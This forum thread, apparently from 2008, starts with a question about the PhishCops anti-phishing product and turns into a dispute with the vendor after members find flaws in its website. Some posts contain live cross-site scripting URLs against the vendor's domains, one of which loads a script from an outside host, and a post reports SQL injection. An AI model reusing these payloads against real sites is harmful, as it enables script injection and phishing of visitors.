Hi,

Phishcops promises to provide an approved T-FA (Two Factor Authentication), and also to protect against Phishing attacks. It was, reportedly, the semi-finalist for Homeland Security Awards in 2005, and 2007.
The modus operandi looks nice. I do realize that there is no substitute for user awareness when it comes to Phishing. What I would like to know is:
1. Has anyone implemeneted/come-across Phishcops anywhere, personally?
2. If yes, how's the pricing compared to hardware T-FA solutions.
3. Other views/rants/suggestions/pointers on the topic are welcome too.

EDIT by thrill: trying to change subject.



Edited 1 time(s). Last edit at 06/02/2008 04:42PM by thrill.

Anything with the word 'cops' in it makes me shiver. brr! :)


Two factor auth has the same problems as SSL has, MIM attacks are still possible.

Quote

Two factor auth has the same problems as SSL has, MIM attacks are still possible.

I still remember the days when everyone thought SecureID was unbreakable.

It is an interesting approach, similar to the way microsoft authenticates computers on an active directory domain.. even though the computer can have the same name, if you had to rebuild the computer it would have a different computer/OS (CLSID) ID (which I assume is the value of the CPID in the URL you bookmark), which I assume works as the salt for the remaining value in the bookmark.

And I'm sure someone smarter than me will be able to find a way to impersonate other computers based on the installed software's CLSID/Name/IP/blah/blah/blah.

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Of course. But again, you need to implement T-FA to be PCI complaint.
We are considering PhishCops for a client who wants some *product* to reduce Phishing attacks in their Banking application.
We do realize that Phishing attacks can't be stopped completely. However, I thought it'd be good to consult a few of you who have any exposure to the PhishCops thingy. I mean they want a *product*, why not give them something cheap and a little worthwhile.

@Ronald:
They *claim* to protect against MITM, Malware *completely* ;)

@thrill:
Hiro Nakamura seriously definitely rocks man. :)
Nice article btw!

---
I'd love to change the world,
but they won't gimme the source code.
Code in my Bug!

Well, if you can make sure a ssl connection is denied usually services switch back to plain http, just like GMail does. If GMail can't connect throught ssl, it switched back to http://. That means that all javascripts and XHR's are going over insecure lines when ssl fails and sniffing becomes possible, so the questions arises then: can one force GMail to block/or shutdown an ssl request? yes that is possible with javascript, or a browser hack, or a local DNS issue/pinning/hackorish thingy. Even then, if the website has a XSS hole, ssl is useless.

@thrill: yeah people who claim it's secure, usually sell snake oil. :)

@Ronald

Yeah right on!

SSL is obsolete and has been for years. Digital certificates make me laugh, lets prove a site is the site you're requesting and lets inject that site with XSS, bye bye SSL. Same goes for a Waterfall I mean Firewall,

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Always nice to see such stuff:

http://www.sestusdata.com/contactus.asp?ContactUs_Name="><script  src="http://www.0x000000.com/x.js"></script><"&Action=SendEmail&ContactUs_Company=&ContactUs_Title=&ContactUs_Email=&ContactUs_Tel=&ContactUs_URL=&ContactUs_CustCount=&ContactUs_OnlineCount=&ContactUs_Body=&formbutton1=Submit

probably needs some other points, well i'm lazy today. they have holes themself that's 4sure.
^^

Since i work in online banking i thought i would give it a quick try. Signed up etc and whilst putting in my password (on relogin) I accidently entered a single quote.

Thats right you can sql inject their system - I guess being a security company these days is about marketing rather then substance.



----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

*sigh* ...yeah that seems to be the adequate conclusion these days, it's a pity. XSS I can live with, but SQL injection goes way to far.

To those concerned.
Sestus Data Company's webmaster was updating the above referenced demo website from PhishCops(R) version 2.7.9, to PhishCops(R) version 2.8.3 on the day the above forum user was performing his SQL injection test. At that time, certain website protocols had been temporarily disabled, including the check for SQL Injection, while the new demo website was being uploaded and tested. The above error was NOT a problem associated with the PhishCops(R) product, but was simply due to certain website protocols having been temporarily disabled while the demo website was being updated.

The PhishCops(R) demo website has now been fully updated to version 2.8.3 and the website security protocols have now been turned back on. Again, this was not a product issue. It was a website issue related to an upgrade we were performing at the time.

Sincerely,
Sestus Data Company
PhishCops(R) Administration
29 April 2008
http://www.phishcops.com
http://www.sestusdata.com



Edited 3 time(s). Last edit at 04/29/2008 06:23PM by SestusData.

Quote

Had the above user performed the same test the following day, he would have seen that there are no SQL injection issues related to the product.

Had this been a real SQL injection, the user would have been threatened with a lawsuit, and his parents IP addresses given to the RIAA for investigation into file sharing activity.

Sounds to me like a new policy needs to be in place for doing server updates/upgrades. There's absolutely 0 chance that I would turn off the majority of protections to my public facing servers to do an upgrade. I rather have no services what so ever than to disable all protection on my server just so I can update it's software... I think a 'thanks for pointing that problem out to us, we have taken care of it' would have sounded better to me.. nice work digi7al64!! :)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Quote

Sestus Data Company's webmaster was updating the above referenced demo website from PhishCops(R) version 2.7.9, to PhishCops(R) version 2.8.3 on the day the above forum user was performing his SQL injection test. At that time, certain website protocols had been temporarily disabled, including the check for SQL Injection

well that's certainly convenient... so did somebody forget to re-enable to antiXSS 'website protocol' too, or is that intentional?

-tx @ lowtech-labs.org

Thank you for your comments.

Our demo website is just that, a simple demo website. No financial, customer, or other sensitive information can be accessed from this demo website. There is no sensitive data in its associated database. As a result, we do not employ the same security policies with regard to updates or changes to our demo website as our customers naturally employ on their actual (live) websites. So, we are not at risk for any type of lawsuits or file sharing complaints.

Please do not confuse a casually maintained demo website with the actual product. Organizations that deploy PhishCops(R) in an live production environment DO employ the security policies you refer to. On a simple demo website that accesses no information, such policies are not required. Our demo website may go down, for example, even for days at a time, while the webmaster makes some change or another. But this should not be mistaken as a failure of the product.

We hope this clarifies the confusion.

Sincerely,
Sestus Data Company
PhishCops(R) Administration
29 April 2008
www.phishcops.com
www.sestusdata.com

@SestusData: sorry it all just sounds like PR-speak to me.
http://www.phishcops.com/help.asp?question=%3Cscript%3Ealert('xss')%3C/script%3E

http://www.phishcops.com/librarian2.asp?doc=javascript%3Aalert%28%27xss%27%29

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 04/29/2008 07:11PM by tx.

@tx - nice.. maybe they're updating to 8.4.12 today... ;)

Gotta love it.. let me just paint you this scenario:

Attacker finds demo site, demo site vulnerable. Attacker injects malware, malware then gets transferred to admins machine due to vulnerable browser, admin then visits 'live site' logging in with 'admin' credentials, admin gets called away to one of those really interesting meetings, attacker sees idle time, attacker takes control of browser and 'admin session'..

But yes, that's a great policy to not secure 'demo' site as much as 'live' site.. keep up the great work! Let me know when I can get in line to sign up for your product!

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill



Edited 1 time(s). Last edit at 04/29/2008 07:17PM by thrill.

I'm not going to be as harsh as these guys, but I do agree - as a security company selling a *security* product which prevents phishing attacks, surely your own web portals would be secured from at least SQL, yet as far as I see, there are multiple XSS holes and an SQL injection in your sites. It really doesn't help to sell your product is all I'm saying - your best option would be to patch your stuff and hope nobody notices that a security company's own site is insecure. Adios.

Heh..

Your IP address has been reported to authorities for repeated violations of the CAN-SPAM Act of 2003
Pub. L. No. 108-187, 117 Stat. 2699 (2003)
codified at 15 U.S.C. §§ 7701-7713 and 18 U.S.C. § 1037

[officer] What is your emergency?
[WebMaster] They found holes in my website!
[officer] Well, are there holes on your website you should fix?
[WebMaster] umm.. yes, but only on my demo site...
[officer] hmm.. are you sure it's only on your demo site?
[WebMaster] umm.. how do I check?
[Manager] hey, maybe we can check the referrer and block anyone coming from that diabolical site.. that'll teach them to find holes in our security solutions!

EDIT: Maybe it's not due to the referrer but rather the fact that after installing their stuff I removed it along with the cookie.. that must make me elegible for the Main Prize of a CAN SPAM award! woohoo!

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill



Edited 1 time(s). Last edit at 04/30/2008 07:24PM by thrill.

Looks like all the issues are fixed in the site. Personally, I'm always wary of someone selling web application security products who have no concept of how to protect against the most common attacks. I understand phishing may seem un-related to someone who isn't extremely comfortable with the subject matter but that's only because it seems that way, and I would have to question someone's know how who said they weren't heavily inter-related.

I've been extremely heavily involved in anti-phishing technology for 3-4 years, do speeches for APWG and so on. If you don't know your way around web applications you have no hope of doing a good job at preventing phishing against even a vaguely sophisticated aggressor.

- RSnake
Gotta love it. http://ha.ckers.org

Thank you for your comments.

Again, our demo site accesses no confidential or sensitive information. Although we do employ protections against sql injection and XSS, we are not as stringent in enforcing such policies on our demo website since launching such attacks against our demo site would serve no purpose. Our webmaster is permitted to temporarily disable such protocols during website upgrades or to facilitate other routine maintenance. Our customer organizations obviously DO protect against sql injection and cross site scripting attacks on their websites where they deploy PhishCops(R) and they naturally rigorously enforce such policies.

This forum serves as a sounding board for individuals who claim an understanding of security, yet it is clear that many cannot differentiate between security method and application. One does not install a two ton magnetic-lock vault door to protect access to a backyard storage shed. While such a door is certainly secure, it is ridiculous on such a structure. It would be costly, difficult to maintain, and serve no useful purpose. Similarly, going to the trouble of applying the level of security on our simple demo website that you suggest, while certainly making it more secure, would serve no useful purpose. If our demo site could be used to, say, access confidential customer data, such protections would be warranted. It does not, so they are not. Our demo site is a casually-maintained demo site, and can be taken down, its database purged, or simply turned off by our webmaster with no impact to our company.

If you were to check other security vendors websites, you would see that many do not employ protections against sql injection or cross-site scripting on their web sites, EXCEPT where their web pages are used to access confidential information. If the web page or its underlying database has no access to such information, most do not bother deploying such security protocols at all.

To suggest that a security vendors product offering must be evaluated based on the level of security applied to their company website simply shows your alarming lack of understanding of basic security principles. The Federal Aviation Administration does not use SSL certificates on their website. Does that mean they are not protecting the security of our air traffic communication channels? Of course not. The Department of Defenses website throws an unhandled server error when invalid characters are posted from their online forms. Does that mean our military is incompetent? Of course not. Again, it is the difference between a theoretical understanding of security principles and actual experience with their proper application.

Our demo site neither captures nor records any confidential information. Its underlying database is similarly innocuous. If our demo websites database was purged or breached by a hacker, it would be inconsequential. Of course, if our database contained anything of value, it would be different. Defending against sql injection and cross-site scripting is a good thing if there is actually something to protect. When there isnt, deploying additional protections becomes unnecessary.

Our customers DO employ protection against cross-site scripting and sql injection on their websites where our PhishCops(R) product is deployed.

Sestus Data Administration

... and before you begin quoting your resumes to us, Sestus Data Company was twice cited by the U.S. Department of Homeland Security for breakthroughs in cyber security, the only authentication vendor to have ever been recognized in this manner. So we DO know a little about security.



Edited 11 time(s). Last edit at 06/01/2008 08:38PM by SestusData.

I would comment on this last posting, but I'm too busy laughing my ass off to put together a coherent sentence.. sorry.. :)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Is he for real?

I think that should market their web site as a "backyard storage shed"

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

thrill Wrote:
-------------------------------------------------------
> I would comment on this last posting, but I'm too
> busy laughing my ass off to put together a
> coherent sentence.. sorry.. :)

I stopped laughing once it began to hurt.

>>and before you begin quoting your resumes to us, Sestus Data Company was twice cited by the U.S. Department of Homeland Security for breakthroughs in cyber security, the only authentication vendor to have ever been recognized in this manner. So we DO know a little about security.


Because we know the Department of Homeland Security knows all about 'security'.

http://www.washingtonpost.com/wp-dyn/content/article/2006/03/15/AR2006031501589.html

We're sorry that you took offense at our response. We were sincerely trying to assist you with understanding the proper application of security techniques. There is such a thing as too much security and when a process does not warrant a certain level of security, adding that security becomes counter-productive. Again, it is the difference between a theoretical understanding of security and practical experience with the subject. Those individuals who described their embarrassed laughter, and who will now undoubtedly begin flinging criticism or insults, simply demonstrate to those with more experience their limited understanding of the subject (and no, don't bother posting your resumes). Anyone with a practical, working understanding of security knows that you don't add more security than is necessary or it becomes counter-productive to the process.

This forum thread was started by one individual's sincere desire to learn more about PhishCops(R). Unfortunately, it became instead a discussion of the proper use of protections against cross-site scripting and sql injection on a website, something unrelated to the PhishCops(R) MFA product. It now appears that the remaining comments being posted are by individuals who are more interested in preserving their own inflated egos than they are in learning about PhishCops(R) or in assisting the original poster with his questions.

Since it appears that no legitimate questions remain, we will consider this thread closed.

Sestus Data Administration



Edited 6 time(s). Last edit at 06/01/2008 10:35AM by SestusData.

Quote

There is such a thing as too much security

There could never be too much security for a company that claims to know security and privacy. But then that's the difference between those who know security and the managers that just quote snippets from press releases.

I once got a best looking award from Stevie Wonder.. he took one look at me and said "you win!", I also got my driving lessons from Ray Charles.. but you're right, I'm disappointed I never got an award from the U.S. Department of Homeland Security for breakthroughs in cyber security.

I'll go cry in the corner now..

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

By your misguided logic, every website in the would must employ SSL certificates, challenge questions, risk-based analysis, geo-location analysis, hardware and software tokens, captchas, and anything else you can think of. After all, you believe "There could never be too much security".

No experienced security professional would agree with your opinion.

To reiterate...this forum thread was started by one individual's sincere desire to learn more about PhishCops(R). It now appears that the remaining comments being posted are by individuals who are more interested in preserving their own inflated egos than they are in learning about PhishCops(R) or in assisting the original poster with his questions.

Since it appears that no legitimate questions remain, we consider this thread closed.

Sestus Data Administration



Edited 1 time(s). Last edit at 06/01/2008 01:59PM by SestusData.

@SestusData

By your misguided logic you apparently don't consider SQL injection or XSS a problem.

You didn't provide "necessary" security on your web site. That's our problem.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

You seem to be missing the basic point. Perhaps this concept is beyond you, but I will make one last attempt to explain....

In point of fact, our demo site does employ protections against XSS and sql injections. Our webmaster has simply disabled them while upgrading the site and we permit this since this is only a casually-maintained, demo website.

The point we were trying to make is, protection against SQL injection, XSS, or any other form of attack is only necessary when they can be used to cause a problem. If they cannot be used to cause damage to the website or its database, what would be the point in protecting against them? SSL certificates can be called necessary too, if it is necessary to encrypt sensitive login or other information. Where no such encryption is necessary, no SSL certificate is deemed necessary. I could go on, but I hope the point is finally clear.

Security is only necessary where something exists which must be secured. You would not put a lock on a safe if the safe did not contain anything which you cared about losing. Our demo site and its underlying database contains NO SENSITIVE INFORMATION. It would not matter if a hacker DID succeed in launching a XSS attack against it. Our webmaster occasionally erases the database himself or takes the site down for routine maintenance. Hence, we do not employ those same levels of security to our demo website which our customers naturally DO EMPLOY to their actual banking websites. That is the point.

To reiterate AGAIN...this forum thread was started by one individual who has a desire to learn more about PhishCops(R). It now appears that the remaining comments being posted are by individuals who are more interested in preserving their own inflated egos than they are in learning about PhishCops(R) or in assisting the original poster with his questions.

I am certain that other postings will follow this one, but we feel any further clarification on this subject would be a waste of our time. For those of you who cannot understand or accept these basic Security 101 principles and who feel you just MUST have the last word, feel free to continue to post whatever you want. Since we are obviously off the forum topic anyway, why not talk about the contents of luncheon meat, or the recent Discovery liftoff. They are as relevant to this forum thread as many of the comments posted herein.

If anyone posts a LEGITIMATE question regarding PhishCops(R), we will be happy to respond. If not, waste as much time as you like, but do not waste any more of ours.

Sestus Data Administration



Edited 10 time(s). Last edit at 06/01/2008 08:44PM by SestusData.

Quote

Since it appears that no legitimate questions remain, we will consider this thread closed.

lol, you sure keep saying alot.


SestusData Wrote:
-------------------------------------------------------
> Protection against SQL injection and XSS is
> necessary BUT ONLY when they can be used to cause
> a problem to the website or its database. If they
> cannot be used to cause damage to the website or
> its database, what would be the point in
> protecting against them?
> [snip]
> Security is only "necessary" where something
> exists which must be secured. Our demo site and
> its underlying database contains NO SENSITIVE
> INFORMATION. It wouldn't matter if a hacker DID
> succeed in launching a SQL injection attack
> against it.

This statements demonstrate an obvious lack of understanding of what XSS and SQL injection are in a real world context. I'm sure you understand the basic technical concept, but there is a lot more than meets the eye. For instance, SQL injection can be leveraged to take over the database server itself. Depending on how your network is set up, you've now given an attacker a clear pathway to other, more sensitive systems. SQL injection can also be used, somewhat more covertly, to turn your PhishCops(R) Security(R) WebSite(R) into a platform for serving 'malware' to your your visitors, likely many of which are your current or potentially future customers. I think your comments show a lack of concern for your customer base, and I wonder if that lack of concern extends into your product (something I intend to explore more, and likely comment on as well).

Not to mention, XSS vulnerabilities on your site makes it really easy to phish people who would be visiting it. Just because you don't have forms that request sensitive customer information on that site doesn't mean that it couldn't be made to look that way with a little injected javascript, css and html... or to quote you:

Quote

You seem to be missing the basic point. Perhaps this concept is beyond you...

-tx @ lowtech-labs.org

Again... this topic is about PhishCops(R), NOT sql injection or xss. Our website is not used as part of the PhishCops(R) product. No phishing attacks can be launched using copies of our website because our website is not used in any fashion by our customers. Our database servers are configured to prevent the type of takeover you describe. Our hosting servers include protocols that prevent the type of malware serving that you describe. Our customers DO protect against SQL injection and XSS, etc, etc, etc.

Whew! It is tiring saying the same things over and over again!

Since you insist on posting off-topic comments, we offer the following similarly-appropriate response:

Bologna sausage is an American sausage somewhat similar to the Italian mortadella, (a finely hashed/ground pork sausage containing cubes of lard that originated in the Italian city of Bologna). US Government regulations require American bologna to be finely ground, and it does not contain visible pieces of fat. Bologna can alternatively be made out of chicken, turkey, beef, or pork. It is commonly called bologna and often pronounced and/or spelled baloney.

Bologna sausage is generally made from low quality scraps of meat cuts. That is possibly the origin of the slang word baloney, meaning nonsense. However, US Government regulations define what meats and byproducts can be legally included in bologna. No more than 3.5% non-meat binders and extenders (such as nonfat dry milk, cereal, or dried whole milk) or 2% isolated soy protein may be used, and they must be listed in the ingredients statement on the product label by their common names.

Bologna is usually served in round uniform slices pre-cut in a package or sliced at a deli. There are many bologna makers, including local delis and grocery store meat counters. A national brand, Oscar Mayer, had an advertising campaign in the 1970s with a jingle (My bologna has a first name, it s O-S-C-A-R...) sung by Andy Lambros. Ring bologna is produced in two inch (5 cm) diameter sausages that are normally about a foot long (30 cm). These can often be found pickled in a combination of vinegar, salt, sugar and spices. Some brands of Bologna have an outer layer of pork fat inside the casing.

Bologna is also popular breakfast food in Newfoundland, served fried as a substitute to ham slices. It is also sometimes barbecued as well. In either case, it is referred to as Newfie Steak.

A similar sausage is known in Australia as Devon, fritz, mortadella, Belgium, luncheon, or polony. Which name is used is dependent on which state one is in.

In Pittsburgh, bologna is sometimes referred to as jumbo. In Chicago, bologna is often called bosaus, a shortened version of bologna sausage. In Montreal, bologna is often referred to as poulet farci, or stuffed chicken in English.



Edited 7 time(s). Last edit at 06/01/2008 04:01PM by SestusData.

lol. you win :) <3

-tx @ lowtech-labs.org